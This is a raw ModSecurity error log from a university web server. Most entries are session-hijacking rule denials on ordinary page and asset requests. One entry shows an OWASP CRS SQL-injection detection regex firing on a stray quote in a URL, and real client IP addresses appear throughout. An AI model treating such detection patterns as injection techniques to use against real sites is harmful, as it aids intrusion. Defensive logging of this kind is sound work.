[Mon Aug 28 06:54:59.424597 2023] [:error] [pid 37313] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOviU8Co-f0AAJHB4UMAAAAD"]
[Mon Aug 28 06:54:59.473501 2023] [:error] [pid 37451] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOviU8Co-f0AAJJLp3sAAAAA"]
[Mon Aug 28 06:54:59.509600 2023] [:error] [pid 37313] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOviU8Co-f0AAJHB4UQAAAAD"]
[Mon Aug 28 06:54:59.521410 2023] [:error] [pid 37499] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOviU8Co-f0AAJJ7Kh8AAAAB"]
[Mon Aug 28 06:54:59.538804 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOviU8Co-f0AAJIfRiMAAAAN"]
[Mon Aug 28 06:54:59.682632 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOviU8Co-f0AAJIfRiQAAAAN"]
[Mon Aug 28 06:54:59.876950 2023] [:error] [pid 37465] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOviU8Co-f0AAJJZZ9YAAAAE"]
[Mon Aug 28 06:56:23.210708 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOvip8Co-f0AAJIfRmoAAAAN"]
[Mon Aug 28 06:56:23.502440 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvip8Co-f0AAJIqOtwAAAAT"]
[Mon Aug 28 06:56:26.386405 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOviqsCo-f0AAJIqOuQAAAAT"]
[Mon Aug 28 06:56:26.533492 2023] [:error] [pid 37426] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOviqsCo-f0AAJIyVzcAAAAc"]
[Mon Aug 28 06:56:31.164241 2023] [:error] [pid 37426] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOvir8Co-f0AAJIyV0EAAAAc"]
[Mon Aug 28 06:56:31.290266 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvir8Co-f0AAJIqOu4AAAAT"]
[Mon Aug 28 06:59:39.920519 2023] [:error] [pid 37418] [client 84.46.245.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:v: oD1MJBggCZA\\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/2021/01/05/webinar-nasional-teknik-sipil-universitas-langlangbuana-tahap-ke-2/\\"https:/www.youtube.com/watch"] [unique_id "ZOvja8Co-f0AAJIqO9YAAAAT"]
[Mon Aug 28 07:00:11.398956 2023] [:error] [pid 37312] [client 66.249.70.169] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvji8Co-f0AAJHAkvgAAAAY"]
[Mon Aug 28 07:02:42.857343 2023] [:error] [pid 37418] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvkIsCo-f0AAJIqO98AAAAT"]
[Mon Aug 28 07:03:50.374975 2023] [:error] [pid 37426] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOvkZsCo-f0AAJIyV-0AAAAc"]
[Mon Aug 28 07:03:51.946779 2023] [:error] [pid 37312] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvkZ8Co-f0AAJHAkwAAAAAY"]
[Mon Aug 28 07:04:42.579855 2023] [:error] [pid 37451] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOvkmsCo-f0AAJJLqHUAAAAA"]
[Mon Aug 28 07:04:42.872657 2023] [:error] [pid 37465] [client 103.3.221.123] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvkmsCo-f0AAJJZaY8AAAAE"]
[Mon Aug 28 07:08:54.893499 2023] [:error] [pid 37451] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvllsCo-f0AAJJLqQYAAAAA"]
[Mon Aug 28 07:08:54.919248 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvllsCo-f0AAJIZSlsAAAAF"]
[Mon Aug 28 07:08:54.935557 2023] [:error] [pid 37619] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvllsCo-f0AAJLzWKsAAAAC"]
[Mon Aug 28 07:08:55.007655 2023] [:error] [pid 37539] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvll8Co-f0AAJKjZTEAAAAG"]
[Mon Aug 28 07:08:58.425259 2023] [:error] [pid 37312] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlmsCo-f0AAJHAkysAAAAY"]
[Mon Aug 28 07:09:01.213152 2023] [:error] [pid 37618] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvlncCo-f0AAJLyEFcAAAAH"]
[Mon Aug 28 07:09:01.254307 2023] [:error] [pid 37619] [client 140.213.16.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvlncCo-f0AAJLzWK0AAAAC"]
[Mon Aug 28 07:09:01.495258 2023] [:error] [pid 37312] [client 140.213.16.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvlncCo-f0AAJHAkywAAAAY"]
[Mon Aug 28 07:09:04.152136 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvloMCo-f0AAJIZSl4AAAAF"]
[Mon Aug 28 07:09:16.576148 2023] [:error] [pid 37574] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlrMCo-f0AAJLG-dYAAAAI"]
[Mon Aug 28 07:09:19.595239 2023] [:error] [pid 37401] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvlr8Co-f0AAJIZSmEAAAAF"]
[Mon Aug 28 07:09:21.194694 2023] [:error] [pid 37312] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvlscCo-f0AAJHAkzEAAAAY"]
[Mon Aug 28 07:09:41.347660 2023] [:error] [pid 37313] [client 114.79.55.115] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvlxcCo-f0AAJHB4w8AAAAD"]
[Mon Aug 28 07:11:31.431574 2023] [:error] [pid 37619] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvmM8Co-f0AAJLzWMsAAAAC"]
[Mon Aug 28 07:11:31.439183 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvmM8Co-f0AAJLwXyEAAAAB"]
[Mon Aug 28 07:11:31.520379 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvmM8Co-f0AAJIsQsQAAAAV"]
[Mon Aug 28 07:11:31.520381 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvmM8Co-f0AAJIobCgAAAAR"]
[Mon Aug 28 07:11:31.521902 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvmM8Co-f0AAJHB4ysAAAAD"]
[Mon Aug 28 07:11:31.590769 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvmM8Co-f0AAJIZSoEAAAAF"]
[Mon Aug 28 07:11:31.599080 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvmM8Co-f0AAJJLqXgAAAAA"]
[Mon Aug 28 07:11:31.600117 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvmM8Co-f0AAJLwXyIAAAAB"]
[Mon Aug 28 07:11:31.680612 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvmM8Co-f0AAJIobCkAAAAR"]
[Mon Aug 28 07:11:31.680636 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvmM8Co-f0AAJIsQsUAAAAV"]
[Mon Aug 28 07:11:31.680744 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvmM8Co-f0AAJNZd6EAAAAJ"]
[Mon Aug 28 07:11:31.751493 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvmM8Co-f0AAJHB4ywAAAAD"]
[Mon Aug 28 07:11:31.759090 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvmM8Co-f0AAJIZSoIAAAAF"]
[Mon Aug 28 07:11:31.839242 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvmM8Co-f0AAJJLqXkAAAAA"]
[Mon Aug 28 07:11:31.840075 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvmM8Co-f0AAJNZd6IAAAAJ"]
[Mon Aug 28 07:11:31.912043 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvmM8Co-f0AAJIZSoMAAAAF"]
[Mon Aug 28 07:11:31.918894 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvmM8Co-f0AAJIsQsYAAAAV"]
[Mon Aug 28 07:11:31.920939 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvmM8Co-f0AAJHB4y0AAAAD"]
[Mon Aug 28 07:11:31.921020 2023] [:error] [pid 37416] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvmM8Co-f0AAJIobCoAAAAR"]
[Mon Aug 28 07:11:32.006949 2023] [:error] [pid 37721] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvmNMCo-f0AAJNZd6MAAAAJ"]
[Mon Aug 28 07:11:32.009061 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvmNMCo-f0AAJLwXyMAAAAB"]
[Mon Aug 28 07:11:32.072143 2023] [:error] [pid 37451] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvmNMCo-f0AAJJLqXoAAAAA"]
[Mon Aug 28 07:11:32.078996 2023] [:error] [pid 37401] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvmNMCo-f0AAJIZSoQAAAAF"]
[Mon Aug 28 07:11:32.079044 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvmNMCo-f0AAJIsQscAAAAV"]
[Mon Aug 28 07:11:32.096852 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvmNMCo-f0AAJHB4y4AAAAD"]
[Mon Aug 28 07:11:32.240366 2023] [:error] [pid 37616] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmNMCo-f0AAJLwXyQAAAAB"]
[Mon Aug 28 07:11:35.121453 2023] [:error] [pid 37313] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOvmN8Co-f0AAJHB4zAAAAAD"]
[Mon Aug 28 07:11:35.239818 2023] [:error] [pid 37420] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvmN8Co-f0AAJIsQskAAAAV"]
